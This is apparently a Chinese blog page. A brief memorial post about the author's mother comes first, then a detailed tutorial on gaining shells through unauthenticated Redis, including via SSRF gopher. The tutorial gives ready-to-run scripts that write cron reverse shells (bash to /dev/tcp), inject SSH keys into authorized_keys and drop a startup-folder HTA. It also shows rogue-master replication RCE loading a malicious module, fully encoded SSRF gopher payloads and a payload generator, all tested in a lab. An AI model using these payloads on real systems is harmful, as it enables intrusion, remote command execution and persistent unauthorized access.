峰焕亭

我娘五周年

2021-01-26T22:36:55.000Z

我娘离开我，转眼五年了，今年由于疫情没有回家祭奠，希望娘能原谅我，等一会儿就去小区给我娘和我姥娘送点钱。

我娘

不喜欢用母亲，用娘更亲切。
我娘小时候学习语文很好，我记得小时候拿那些盗版书还是啥书擦屁股，有时候上面是文言文，我娘还给我从厕所里面拿出来说上面写得多好，让我看一看，我都看不懂，因为那上面写得太文言文了。我语文不好，主要是作文写着写着就没思绪了，就不知道该写啥，记得小学升初中之前，我娘自己给我手写了好几篇作文让我看。
如果我娘还在的话，那该多好哇，我娘也应该54岁了，我娘67年的，属羊的，我爸属狗的。
有空了在互联网上放几张我和我娘的照片，我还有一些视频存着。

从来没有走出过那个地方

我印象中我娘只有两次离开家乡，一次是从家到河南，坐得还是汽车，因为我姨结婚，我姨夫是河南的；还有一次是送我到日照上学，不过也是坐得汽车，回去也是坐得汽车，我还记得坐得是到青岛的汽车，那时候汽车就把我们仨扔到高速路口就走了。
所以我娘从来没坐过火车，甚至没坐过绿皮火车，更没坐过飞机、轮船，不是想说火车多么高级，只是想让我娘体验一下，接触新鲜事物。因为我娘一直在家忙这忙那，连个周末休息日都没有，天天忙，去趟县城是唯一能让她快乐的事，那时候我陪着我娘逛县城一些街边卖衣服的小店，我都逛累了她还是那么能跑，但是也没见她买衣服，唯一舍得的是去商场给我买那些贵的保暖的衣服。

十周年

希望能在十周年的时候好好地给我娘过一个十周年。

写得不多，越写越想哭，去给我娘送钱去了。

2020-01-26晚于北京上地东里

redis getshell实战

2020-07-24T22:02:00.000Z

ssrf会造成内网漫游，redis作为一种内网常用的中间件易受到攻击，本文主要实践了redis未授权下的攻击和利用，主要从写文件和主从复制RCE两个方面进行了阐述，期间遇到了一些坑，记录下来以飨众人。

写文件

写文件这个功能其实就是通过修改redis的dbfilename、dir配置项，通常来说掌控了写文件也就完成了rce的一半，这几种写文件来getshell的方式也是最有效最简单的。

Windows

开机自启动

在Windows 系统中有一个特殊的目录叫自启动目录，在这个目录下的文件在开机的时候都会被运行。

1	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\redis_rce.hta

笔者把下面这段JScript执行calc命令的代码写到了该目录下，

\n\n'|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp'  # 指定本地数据库存放目录
redis-cli -h $1 -p $2 config set dbfilename redis_rce.hta  # 指定本地数据库文件名，默认值为dump.rdb
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

config set dir后面的路径要加引号，否则会报错，加引号之后的报错可以忽略，因为Linux上面没有这个路径。

127.0.0.1:6379> config set dir C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp
(error) ERR Wrong number of arguments for CONFIG set
127.0.0.1:6379> config set dir 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp'
(error) ERR Changing directory: No such file or directory

在转换流量的时候要把下面的报错信息去掉，

1 2	< 2020/07/23 16:00:40.500366 length=52 from=0 to=51 -ERR Changing directory: No such file or directory\r

得到gopher协议payload，

1
2
3

# xiaopo @ fht in ~/python/POC/ssrf [16:08:46] 
$ python tran2gopher.py socat_windows_startup.log
*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$92%0d%0a%0a%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$60%0d%0aC:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$13%0d%0aredis_rce.hta%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a

然后还需对上面内容的特殊字符进行url编码，比如%，因为ssrf利用经过了两个协议（先http后gopher），最终payload触发，

Linux

以下三种利用方式都需要有写文件权限（这不废话），需要redis以root权限运行。
redis原始信息

[root@localhost redis]# redis-cli 
127.0.0.1:6379> config get dir
1) "dir"
2) "/var/lib/redis"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "dump.rdb"
127.0.0.1:6379> get 1
"\n\n12345\n"

crontab

定时任务目录

centos:
/var/spool/cron/root # centos系统下root用户的cron文件，实际测试成功。
/etc/crontab # 该位置的payload需要加root，实际测试成功。
/etc/cron.d/* # 将利用这个目录，可以做到不覆盖任何其他文件的情况进行反弹shell，实际测试成功。

ubuntu：
/var/spool/cron/crontabs/root # debian系统下root用户的cron文件，实际测试不能成功反弹shell。
/etc/crontab # 该位置的payload需要加root，实际测试不能成功反弹shell。
/etc/cron.d/* # 利用这个目录，可以做到不覆盖任何其他文件的情况进行反弹shell，实际测试不能成功反弹shell。

getshell_crontab.sh内容如下，

echo -e "\n\n* * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir /var/spool/cron/  # 指定本地数据库存放目录
redis-cli -h $1 -p $2 config set dbfilename root  # 指定本地数据库文件名，默认值为dump.rdb
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

注意：有些系统对 crontab 的文件内容的校验比较严格可能会导致无法执行定时任务，以上代码在centos7下测试成功，

[root@localhost redis]# bash getshell_crontab.sh 127.0.0.1 6379
OK
OK
OK
OK
OK

127.0.0.1:6379> get 1
"\n\n* * * * * bash -i >& /dev/tcp/192.168.0.106/2333 0>&1\n\n\n"
127.0.0.1:6379> config get dir
1) "dir"
2) "/var/spool/cron"
127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "root"

写入文件/var/spool/cron/root内容如下，

REDIS0007ú      redis-ver^F3.2.12ú
redis-bitsÀ@ú^EctimeÂ±C^C_ú^Hused-memÂøf^L^@þ^@û^A^@^@À^A:

* * * * * bash -i >& /dev/tcp/192.168.0.106/2333 0>&1


ÿ<91>Å  <87>7^X´g

在Linux Mint19.3也就是Ubuntu 18.04 LTS上面测试多个目录均无法成功save，

root@mint-VirtualBox:/data/hack/B/middleware/redis# bash getshell_crontab.sh 127.0.0.1 6379
OK
OK
OK
(error) ERR
OK

查看redis运行权限发现是redis用户，

1
2
3

mint@mint-VirtualBox:~$ ps -ef | grep redis
redis     1750     1  0 23:22 ?        00:00:00 /usr/bin/redis-server 127.0.0.1:6379
mint      1755  1682  0 23:22 pts/0    00:00:00 grep --color=auto red

同时从redis配置文件中找到redis log位置，然后查看日志，发现主要原因是只读权限，

2958:M 17 Jul 16:55:31.014 * 1 changes in 900 seconds. Saving...
2958:M 17 Jul 16:55:31.014 * Background saving started by pid 4151
4151:C 17 Jul 16:55:31.015 # Failed opening the RDB file dump.rdb (in server root dir /var/spool/cron) for saving: Read-only file system
2958:M 17 Jul 16:55:31.115 # Background saving error
2958:M 17 Jul 16:55:37.103 * 1 changes in 900 seconds. Saving...
2958:M 17 Jul 16:55:37.104 * Background saving started by pid 4152
4152:C 17 Jul 16:55:37.105 # Failed opening the RDB file dump.rdb (in server root dir /var/spool/cron) for saving: Read-only file system
2958:M 17 Jul 16:55:37.204 # Background saving error

停止redis服务，然后sudo运行，查看为root运行权限，

mint@mint-VirtualBox:~$ service redis stop
mint@mint-VirtualBox:~$ ps -ef | grep redis
mint      1922  1682  0 23:30 pts/0    00:00:00 grep --color=auto redis
mint@mint-VirtualBox:~$ sudo /usr/bin/redis-server 
1978:C 17 Jul 23:35:34.339 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
1978:C 17 Jul 23:35:34.339 # Redis version=4.0.9, bits=64, commit=00000000, modified=0, pid=1978, just started
1978:C 17 Jul 23:35:34.339 # Warning: no config file specified, using the default config. In order to specify a config file use /usr/bin/redis-server /path/to/redis.conf
1978:M 17 Jul 23:35:34.340 * Increased maximum number of open files to 10032 (it was originally set to 1024).
mint@mint-VirtualBox:~$ ps -ef | grep redis
root      1977  1682  0 23:35 pts/0    00:00:00 sudo /usr/bin/redis-server
root      1978  1977  0 23:35 pts/0    00:00:00 /usr/bin/redis-server *:6379
mint      1996  1985  0 23:35 pts/1    00:00:00 grep --color=auto redis

再次运行利用脚本，成功写入/var/spool/cron/crontabs/root，

REDIS0008ú      redis-ver^E4.0.9ú
redis-bitsÀ@ú^EctimeÂvÆ^Q_ú^Hused-memÂÈ#^M^@ú^Laof-preambleÀ^@þ^@û^A^@^@À^A:

* * * * * bash -i >& /dev/tcp/192.168.0.106/2333 0>&1


ÿ<9c>^TL¶d¦ª

奇怪的是，即使成功写入，也并未触发反弹shell，重启cron服务无效

1	sudo service cron status

查看cron log日志，发现没有开启，找到rsyslog日志中cron部分，去掉前面的#号，重启rsyslog

mint@mint-VirtualBox:~$ less -10 /var/log/cron.log
/var/log/cron.log: No such file or directory
mint@mint-VirtualBox:~$ sudo vim /etc/rsyslog.d/50-default.conf
mint@mint-VirtualBox:~$ sudo service rsyslog restart

cron log日志如下，

1
2
3

int@mint-VirtualBox:~$ tail -f /var/log/cron.log
Jul 18 18:33:05 mint-VirtualBox crontab[2035]: (root) LIST (root)
Jul 18 18:34:02 mint-VirtualBox cron[573]: (root) INSECURE MODE (mode 0600 expected) (crontabs/root)

网上搜索必须”chmod 600”才行，默认的情况好像是644？

mint@mint-VirtualBox:~$ sudo ls -l /var/spool/cron/crontabs/
total 4
-rw-r--r-- 1 root root 54 Jul 18 17:36 root
mint@mint-VirtualBox:~$ sudo chmod 600 /var/spool/cron/crontabs/root
mint@mint-VirtualBox:~$ sudo ls -l /var/spool/cron/crontabs/
total 4
-rw------- 1 root root 54 Jul 18 17:36 root
mint@mint-VirtualBox:~$ sudo service cron restart

然后继续观察日志，

Jul 18 19:17:01 mint-VirtualBox CRON[2759]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
Jul 18 19:26:01 mint-VirtualBox cron[2173]: (root) RELOAD (crontabs/root)
Jul 18 19:26:01 mint-VirtualBox cron[2173]: Error: bad minute; while reading crontab for user root
Jul 18 19:26:01 mint-VirtualBox cron[2173]: (root) ERROR (Syntax error, this crontab file will be ignored)
Jul 18 19:27:09 mint-VirtualBox crontab[2843]: (root) LIST (root)

据上面日志猜测可能是由于crontab文件格式的问题，我们尝试把/var/spool/cron/crontabs/root文件内容改成一条反弹shell的任务，即

1 2	root@mint-VirtualBox:/data/hack/C/middleware/redis# cat /var/spool/cron/crontabs/root * * * * * bash -i >& /dev/tcp/192.168.0.106/2333 0>&1

webshell

需要知道web目录

ssh key

1
2
3

# xiaopo @ fht in ~ [22:20:29] C:130
$ cat ~/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOVgEY/clVIFD7U/pbZly0jW5PJs6BV8gG6hKvQT3FjQUpMNADHy/MgjIoeBQpCLSRv5fOHSLVdxFgTe8qgX6s8wR1JlLPCgRPAfr8LbpxQcuw5zVqbA9DsYxEf+6Qry+SeZWXOB8tHWSZBMK7BX09g1y/hTEsrd1d/VoPBci8kUsuybqnaoRGz8p4YaJFl+jiI5SIcTb/mJTcyPOK0hFCDL7ylSJLXn/BaT5E8dPuZzj+Oha+k8PabEf0V22Jmt7gDL7e7Omit277liorsNARBH4LccPk9T9cOdmlxMswjEA3+Xbb6f3kgYaxEg6SHEWkSvMyt+x3NM6R76q5H8Nx xiaopo@fht

sshkey.sh内容如下，

echo -e "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOVgEY/clVIFD7U/pbZly0jW5PJs6BV8gG6hKvQT3FjQUpMNADHy/MgjIoeBQpCLSRv5fOHSLVdxFgTe8qgX6s8wR1JlLPCgRPAfr8LbpxQcuw5zVqbA9DsYxEf+6Qry+SeZWXOB8tHWSZBMK7BX09g1y/hTEsrd1d/VoPBci8kUsuybqnaoRGz8p4YaJFl+jiI5SIcTb/mJTcyPOK0hFCDL7ylSJLXn/BaT5E8dPuZzj+Oha+k8PabEf0V22Jmt7gDL7e7Omit277liorsNARBH4LccPk9T9cOdmlxMswjEA3+Xbb6f3kgYaxEg6SHEWkSvMyt+x3NM6R76q5H8Nx xiaopo@fht\n\n"|redis-cli -h $1 -p $2 -x set 1
redis-cli -h $1 -p $2 config set dir /root/.ssh/   # 指定本地数据库存放目录
redis-cli -h $1 -p $2 config set dbfilename authorized_keys  # 指定本地数据库文件名，默认值为dump.rdb
redis-cli -h $1 -p $2 save
redis-cli -h $1 -p $2 quit

以上代码在centos7测试并连接成功，当然前提需要有/root/.ssh/这个目录，

[root@localhost redis]# mkdir -p /root/.ssh/
[root@localhost redis]# bash sshkey.sh 127.0.0.1 6379
OK
OK
OK
OK
OK
[root@localhost redis]# redis-cli
127.0.0.1:6379> get 1
"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOVgEY/clVIFD7U/pbZly0jW5PJs6BV8gG6hKvQT3FjQUpMNADHy/MgjIoeBQpCLSRv5fOHSLVdxFgTe8qgX6s8wR1JlLPCgRPAfr8LbpxQcuw5zVqbA9DsYxEf+6Qry+SeZWXOB8tHWSZBMK7BX09g1y/hTEsrd1d/VoPBci8kUsuybqnaoRGz8p4YaJFl+jiI5SIcTb/mJTcyPOK0hFCDL7ylSJLXn/BaT5E8dPuZzj+Oha+k8PabEf0V22Jmt7gDL7e7Omit277liorsNARBH4LccPk9T9cOdmlxMswjEA3+Xbb6f3kgYaxEg6SHEWkSvMyt+x3NM6R76q5H8Nx xiaopo@fht\n\n\n"
127.0.0.1:6379> exit
[root@localhost redis]# cat /root/.ssh/authorized_keys 
REDIS0007�redis-ver3.2.12�
redis-bits�@�ctime²�_used-memh
                                ���A�

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOVgEY/clVIFD7U/pbZly0jW5PJs6BV8gG6hKvQT3FjQUpMNADHy/MgjIoeBQpCLSRv5fOHSLVdxFgTe8qgX6s8wR1JlLPCgRPAfr8LbpxQcuw5zVqbA9DsYxEf+6Qry+SeZWXOB8tHWSZBMK7BX09g1y/hTEsrd1d/VoPBci8kUsuybqnaoRGz8p4YaJFl+jiI5SIcTb/mJTcyPOK0hFCDL7ylSJLXn/BaT5E8dPuZzj+Oha+k8PabEf0V22Jmt7gDL7e7Omit277liorsNARBH4LccPk9T9cOdmlxMswjEA3+Xbb6f3kgYaxEg6SHEWkSvMyt+x3NM6R76q5H8Nx xiaopo@fht


�B�I$��:[root@localhost redis]#

在Mint下写入并连接成功，

root@mint-VirtualBox:/data/hack/C/middleware/redis# cat /root/.ssh/authorized_keys 
REDIS0008�redis-ver4.0.9�
redis-bits�@�ctime�Z
�                   _used-mem�$
 aof-preamble����A�

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOVgEY/clVIFD7U/pbZly0jW5PJs6BV8gG6hKvQT3FjQUpMNADHy/MgjIoeBQpCLSRv5fOHSLVdxFgTe8qgX6s8wR1JlLPCgRPAfr8LbpxQcuw5zVqbA9DsYxEf+6Qry+SeZWXOB8tHWSZBMK7BX09g1y/hTEsrd1d/VoPBci8kUsuybqnaoRGz8p4YaJFl+jiI5SIcTb/mJTcyPOK0hFCDL7ylSJLXn/BaT5E8dPuZzj+Oha+k8PabEf0V22Jmt7gDL7e7Omit277liorsNARBH4LccPk9T9cOdmlxMswjEA3+Xbb6f3kgYaxEg6SHEWkSvMyt+x3NM6R76q5H8Nx xiaopo@fht


�a��/ԡOroot@mint-VirtualBox:/data/hack/C/middleware/redis#

反序列化

待补充

主从复制RCE

原理

前言：比起以前的利用方式来说，这种利用方式更为通用，危害也更大，因为随着现代的服务部署方式的不断发展，组件化成了不可逃避的大趋势，docker就是这股风潮下的产物之一，而在这种部署模式下，一个单一的容器中不会有除redis以外的任何服务存在，包括ssh和crontab，再加上权限的严格控制，只靠写文件就很难再getshell了，在这种情况下，我们就需要其他的利用手段了。

redis主从复制：Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。可以通过下来理解，其中slaveof 172.17.0.2就是将172.17.0.2设置为自己的主节点，主机数据会同步到每个从节点。

# xiaopo @ fht in ~ [23:34:45] 
$ docker inspect --format='{{.NetworkSettings.IPAddress}}' $(docker ps -a -q)
172.17.0.2
172.17.0.3

# xiaopo @ fht in ~ [23:34:46] 
$ redis-cli -h 172.17.0.3 -p 6379                                            
172.17.0.3:6379> slaveof 172.17.0.2 6379
OK
172.17.0.3:6379> get b
(nil)
172.17.0.3:6379> exit

# xiaopo @ fht in ~ [23:35:14] 
$ redis-cli -h 172.17.0.2 -p 6379
172.17.0.2:6379> get b
(nil)
172.17.0.2:6379> set b 1
OK
172.17.0.2:6379> exit

# xiaopo @ fht in ~ [23:35:22] 
$ redis-cli -h 172.17.0.3 -p 6379
172.17.0.3:6379> get b
"1"
172.17.0.3:6379>

redis主从数据库之间的同步分为两种，全量复制和部分复制，全量复制是将数据库备份文件整个传输过去，然后从节点清空内存数据库，将备份文件加载到数据库中。而部分复制只是将写命令发送给从节点。所以务必注意此方法会清空目标数据库。

redis模块：在Reids 4.x之后，Redis新增了模块功能，通过外部扩展，可以实现在redis中实现一个新的Redis命令，通过写c语言并编译出.so文件。比如写一个可以执行系统命令的扩展：

# xiaopo @ fht in ~ [23:40:02] 
$ redis-cli
127.0.0.1:6379> module load /home/xiaopo/python/POC/redis/redis-rce/exp.so
OK
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379>

受影响版本：<=5.0.5

原始paper：https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
主要利用方法如下：

第一步，我们伪装一个redis数据库，然后目标redis将我们的redis数据库设置为主节点。
第二步，我们获得目标redis dbfilename的值，或设置目标redis的dbfilename为so文件
第三步，设置传输方式为全量传输，并将已编译为.so文件的攻击扩展作为payload发送。
第四步，在目标客户机加载dbfilename文件，成功加载扩展，扩展里面实现了任意命令执行。

利用方法

利用条件：必需一个外网IP模拟redis rogue server，且内网redis能出外网。

现在网上大部分的利用方法都是攻击外网未授权redis，比如已有的exp：https://github.com/Ridter/redis-rce

对于攻击内网未授权redis，比如利用ssrf gopher协议，是需要在外网模拟redis rogue server，内网构造payload发送的。笔者实际演示一下，

先使用socat抓到实际协议流量
socat -v tcp-listen:4444,fork tcp-connect:localhost:6379

运行上面的exp，
python3 redis-rce.py -r 127.0.0.1 -p 4444 -L 127.0.0.1 -P 2333 -f exp.so -v

注意上面的FULLRESYNC流量是master响应包（master在2333端口），响应slave数据库的PSYNC请求的（slave端口在6379），而我们抓包流量是4444->6379，所以下面是没有这个包的流量的。

此时目标redis已经加载了扩展，

127.0.0.1:6379> whoami
(error) ERR unknown command 'whoami'
127.0.0.1:6379> system.exec 'whoami'
"root\n"

但是我们想反弹shell，故继续往下转发流量

获得反弹到3000端口的shell，

拷贝流量到socat.log，需要处理一下socat.log，把前面的INFO部分去掉，得到

> 2020/07/20 12:23:45.195249  length=42 from=14 to=55
*3\r
$7\r
SLAVEOF\r
$9\r
127.0.0.1\r
$4\r
2333\r
< 2020/07/20 12:23:45.195443  length=5 from=2716 to=2720
+OK\r
> 2020/07/20 12:23:45.195529  length=54 from=56 to=109
*4\r
$6\r
CONFIG\r
$3\r
SET\r
$10\r
dbfilename\r
$6\r
exp.so\r
< 2020/07/20 12:23:45.195646  length=5 from=2721 to=2725
+OK\r
> 2020/07/20 12:23:49.579654  length=40 from=110 to=149
*3\r
$6\r
MODULE\r
$4\r
LOAD\r
$8\r
./exp.so\r
< 2020/07/20 12:23:49.583106  length=5 from=2726 to=2730
+OK\r
> 2020/07/20 12:23:49.583585  length=34 from=150 to=183
*3\r
$7\r
SLAVEOF\r
$2\r
NO\r
$3\r
ONE\r
< 2020/07/20 12:23:49.584298  length=5 from=2731 to=2735
+OK\r
> 2020/07/20 12:23:57.257107  length=46 from=184 to=229
*3\r
$10\r
system.rev\r
$9\r
127.0.0.1\r
$4\r
3000\r
> 2020/07/20 12:23:57.300300  length=56 from=230 to=285
*4\r
$6\r
CONFIG\r
$3\r
SET\r
$10\r
dbfilename\r
$8\r
dump.rdb\r
> 2020/07/20 12:25:27.132319  length=80 from=286 to=365
*2\r
$11\r
system.exec\r
$11\r
rm ./exp.so\r
*3\r
$6\r
MODULE\r
$6\r
UNLOAD\r
$6\r
system\r

然后使用脚本python3 tran2gopher.py socat.log转换成gohper协议的，最后\r需要替换成%0d%0a
随后启动redis rogue server，python3 redis-rogue-server.py --lport 2333 -f redis-rce/exp.so，启动监听3000端口$ nc -lvvp 3000
先用curl模拟gopher协议测试是否正确，

然后利用ssrf漏洞测试也成功触发，记得要对gopher://协议进行特殊字符的url编码，比如%，因为这是经过了两个协议（先http后gopher）

http://localhost/vuln/ssrf.php?test=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%2A3%250d%250a%247%250d%250aSLAVEOF%250d%250a%249%250d%250a127.0.0.1%250d%250a%244%250d%250a2333%250d%250a%2A4%250d%250a%246%250d%250aCONFIG%250d%250a%243%250d%250aSET%250d%250a%2410%250d%250adbfilename%250d%250a%246%250d%250aexp.so%250d%250a%2A3%250d%250a%246%250d%250aMODULE%250d%250a%244%250d%250aLOAD%250d%250a%248%250d%250a.%2Fexp.so%250d%250a%2A3%250d%250a%247%250d%250aSLAVEOF%250d%250a%242%250d%250aNO%250d%250a%243%250d%250aONE%250d%250a%2A3%250d%250a%2410%250d%250asystem.rev%250d%250a%249%250d%250a127.0.0.1%250d%250a%244%250d%250a3000%250d%250a%2A4%250d%250a%246%250d%250aCONFIG%250d%250a%243%250d%250aSET%250d%250a%2410%250d%250adbfilename%250d%250a%248%250d%250adump.rdb%250d%250a%2A2%250d%250a%2411%250d%250asystem.exec%250d%250a%2411%250d%250arm%20.%2Fexp.so%250d%250a%2A3%250d%250a%246%250d%250aMODULE%250d%250a%246%250d%250aUNLOAD%250d%250a%246%250d%250asystem%250d%250a

我们尝试一下不用redis rogue server，直接发包FULLRESYNC可不可以成功，首先要抓到FULLRESYNC流量，也就是redis master与redis slave通信流量，我们采用python程序进行生成，

import binascii
from optparse import OptionParser

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-f", "--exp", dest="exp", type="string", help="Redis Module to load, default exp.so", default="exp.so", metavar="EXP_FILE")

    (options, args) = parser.parse_args()
    exp_filename = options.exp
    print("Load the payload: %s" % exp_filename)

    CRLF = "\r\n"
    gopher_resp = ''

    payload = open(exp_filename, "rb").read()
    fullresync_resp = "+FULLRESYNC " + "Z" * 40 + " 1" + CRLF
    fullresync_resp += "$" + str(len(payload)) + CRLF
    fullresync_resp = fullresync_resp.encode()
    fullresync_resp += payload + CRLF.encode()
    # for test, success
    # fullresync_resp = b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
    print(fullresync_resp)
    for i in fullresync_resp:
        if 48 <= i < 58 or 65 <= i < 91 or 97 <= i < 123:  # [0-9|A-Z|a-z]
            gopher_resp += binascii.unhexlify(hex(i)[2:]).decode()
        # urlencode
        elif 1 == len(hex(i)[2:]):
            gopher_resp += '%0' + hex(i)[2:]
        elif 2 == len(hex(i)[2:]):
            gopher_resp += '%' + hex(i)[2:]
        else:
            print('[!] error')
    print(gopher_resp)

先测试一下CONFIG SET dbfilename exp.so这种普通命令是否可行，

/usr/bin/python3.6 /home/xiaopo/python/POC/redis/fullresync_packet.py -f redis-rce/exp.so
Load the payload: redis-rce/exp.so
b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
%2a4%0d%0a%246%0d%0aCONFIG%0d%0a%243%0d%0aSET%0d%0a%2410%0d%0adbfilename%0d%0a%246%0d%0aexp%2eso%0d%0a

# xiaopo @ fht in ~/python/POC/ssrf [20:32:14] 
$ curl -v 'gopher://127.0.0.1:6379/_%2a4%0d%0a%246%0d%0aCONFIG%0d%0a%243%0d%0aSET%0d%0a%2410%0d%0adbfilename%0d%0a%246%0d%0aexp%2eso%0d%0a'
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 6379 (#0)
+OK

127.0.0.1:6379> config get dbfilename
1) "dbfilename"
2) "exp.so"

在不开启redis rogue server的情况下，构造三段payload测试依次发送，

*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$9%0d%0a127.0.0.1%0d%0a$4%0d%0a2333%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$6%0d%0aexp.so%0d%0a

%2bFULLRESYNC%20ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ%201%0d%0a%2444328%0d%0a%7fELF%02%01%01%00%00%00%00%00%00%00%00%00%03%00%3e%00%01%00%00%00%80%28%00%00%00%00%00%00%40%00%00%00%00%00%00%00%28%a7%00%00%00%00%00%00%00%00%00%00%40%008%00%05%00%40%00%18%00%17%00%01%00%00%00%05%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00DH%00%00%00%00%00%00DH%00%00%00%00%00%00%00%00%20%00%00%00%00%00%01%00%00%00%06%00%00%00%a0N%00%00%00%00%00%00%a0N%20%00%00%00%00%00%a0N%20%00%00%00%00%00%f0%01%00%00%00%00%00%00%d0%05%00%00%00%00%00%00%00%00%20%00%00%00%00%00%02%00%00%00%06%00%00%00%a0N%00%00%00%00%00%00%a0N%20%00%00%00%00%00%a0N%20%00%00%00%00%00%60%01%00%00%00%00%00%00%60%01%00%00%00%00%00%00%08%00%00%00%00%00%00%00Q%e5td%06%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%10%00%00%00%00%00%00%00R%e5td%04%00%00%00%a0N%00%00%00%00%00%00%a0N%20%00%00%00%00%00%a0N%20%00%00%00%00%00%60%01%00%00%00%00%00%00%60%01%00%00%00%00%00%00%01%00%00%00%00%00%00%00%83%00%00%00%92%00%00%00%00%00%00%004%00%00%00%00%00%00%00V%00%00%00u%00%00%00H%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%20%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%1d%00%00%00%83%00%00%00%00%00%00%00%00%00%00%00%09%00%00%005%00%00%00E%00%00%001%00%00%00%11......

*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a./exp.so%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a*3%0d%0a$10%0d%0asystem.rev%0d%0a$9%0d%0a127.0.0.1%0d%0a$4%0d%0a3000%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$8%0d%0adump.rdb%0d%0a*2%0d%0a$11%0d%0asystem.exec%0d%0a$11%0d%0arm ./exp.so%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$6%0d%0aUNLOAD%0d%0a$6%0d%0asystem%0d%0a

其中在第二段payload在+FULLRESYNC发送的时候报错，

*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 6379 (#0)
-ERR unknown command '+FULLRESYNC'
-ERR unknown command '$44328'

提示没有+FULLRESYNC命令，因为以+开头的命令是响应包，我们尝试把+去掉，再次发包，

*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 6379 (#0)
-ERR unknown command 'FULLRESYNC'
-ERR unknown command '$44328'

依然不行，看来还是需要rogue server与之自然交互。

Lua RCE

原理：https://www.anquanke.com/post/id/151203/

exp：https://github.com/QAX-A-Team/redis_lua_exploit/

docker测试，redis版本4.0.14，修改redis_lua.py中的ip和port之后运行，报错：https://github.com/QAX-A-Team/redis_lua_exploit/issues/1 尚未解决

Tips

参考https://ricterz.me/posts/2019-07-08-two-tricks-of-redis-exploitation.txt

If target redis disabled CONFIG SET, SAVE commands, try to use EVAL "return redis.call('config', 'set', 'dir', '/root')", BGSAVE, it only works on Redis 4.x.
On Redis 5.x, CONFIG command is a “no-script” command, which means you cannot invoke this command in Redis lua.

其中eval的格式为

127.0.0.1:6379> eval "要执行的lua命令" key的个数 [KEYS[1]...] [AVRG[1]...]
例子
127.0.0.1:6379> eval "return redis.call('SET',KEYS[1],ARGV[1])" 1 foo bar
OK
127.0.0.1:6379> eval "return redis.call('SET','name','gulugulu')" #没有写key个数，程序报错
(error) ERR wrong number of arguments for 'eval' command
127.0.0.1:6379> eval "return redis.call('SET','name','gulugulu')" 0
OK

笔者尝试redis 4.0.9和redis 4.0.14两个版本均提示成功，

127.0.0.1:6379> EVAL "return redis.call('config', 'set', 'dir', '/root')" 0
OK
127.0.0.1:6379> BGSAVE
Background saving started

参考

php session反序列化漏洞

2020-07-10T15:55:09.000Z

